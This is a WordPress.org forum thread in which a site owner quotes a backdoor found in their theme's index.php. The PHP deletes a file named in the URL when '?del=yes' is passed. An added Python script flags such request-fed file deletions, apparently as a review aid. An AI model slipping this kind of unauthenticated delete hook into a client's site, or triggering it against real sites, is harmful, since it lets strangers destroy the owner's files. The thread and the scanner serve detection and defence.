WordPress.org

backdoor (1 post)

  1. bobbyl76
    Member
    Posted 1 year ago #

    A coder friend found what he said was a type of kill switch backdoor in my index.php file. It was worked on by a freelancer from overseas. The code looks like this:

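    ```php
    // Runs only when the request carries ?del=yes
    if(isset($_GET['del']) && $_GET['del']=='yes'){

        $path = $_SERVER['SCRIPT_FILENAME'];
        $file = $_GET['filename'];   // file name taken straight from the URL

        $fullpath = "wp-content/themes/forest/".$file;

        // Replace "index.php" in the script path with the theme file path, then delete that file
        $fpath = str_replace("index.php", $fullpath,$path);
        unlink($fpath);
    }
    ```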

    He says this code could allow anyone with the URL and knowledge of the code to delete my index page.

    Is this true?

    If it is, beyond removing this code from the index.php, is there a way to check for any other kinds of code? I have "All in one WP Security" and it never found this exploit. My friend also suggested I find a plugin to check to see if any of the core WordPress files have been tampered with.

    Can anyone recommend something and/or advise if that code is malicious?
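
An added example, not part of the original post and not taken from any WordPress plugin: a Python review aid that flags file-deleting or file-overwriting PHP calls, like the `unlink()` in the snippet above, when their argument traces back to request parameters through a chain of variable assignments. The sink list, the function names and the line-by-line matching are assumptions of this example; it reports candidates for manual review and does not replace comparing core files against a clean WordPress copy.

```python
import re
from pathlib import Path

# Request superglobals that a remote client controls directly.
SOURCES = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
# Calls that delete, move or overwrite files (the posted snippet uses unlink).
SINKS = re.compile(r"\b(unlink|rmdir|rename|file_put_contents)\s*\(([^;]*)\)\s*;")
ASSIGN = re.compile(r"^\s*(\$\w+)\s*=(?!=)\s*(.+?);\s*$")
VAR = re.compile(r"\$\w+")

def find_tainted_sinks(php_source):
    """Return (line_no, function, code) for each sink call fed by request data."""
    tainted, findings = set(), []

    def is_tainted(expr):
        return bool(SOURCES.search(expr) or tainted & set(VAR.findall(expr)))

    for no, line in enumerate(php_source.splitlines(), 1):
        for call in SINKS.finditer(line):
            if is_tainted(call.group(2)):
                findings.append((no, call.group(1), line.strip()))
        m = ASSIGN.match(line)
        if m:
            target, expr = m.groups()
            if is_tainted(expr):
                tainted.add(target)       # taint follows the assignment
            else:
                tainted.discard(target)   # clean reassignment clears it
    return findings

def scan_tree(root):
    """Run the check over every .php file under root (e.g. wp-content/themes)."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = find_tainted_sinks(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

# The code from the post above, used as sample input.
PAGE_SNIPPET = """\
if(isset($_GET['del']) && $_GET['del']=='yes'){
$path = $_SERVER['SCRIPT_FILENAME'];
$file = $_GET['filename'];
$fullpath = "wp-content/themes/forest/".$file;
$fpath = str_replace("index.php", $fullpath,$path);
unlink($fpath);
}
"""
# Constructed benign sample: the deleted path is a fixed string.
BENIGN = '$cache = WP_CONTENT_DIR . "/cache/stale.tmp";\nunlink($cache);\n'
```

Calling `scan_tree("wp-content/themes")` from the site root returns a dict of file paths to findings; an empty dict means nothing matched this one pattern, not that the theme is clean.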

Topic Closed

This topic has been closed to new replies.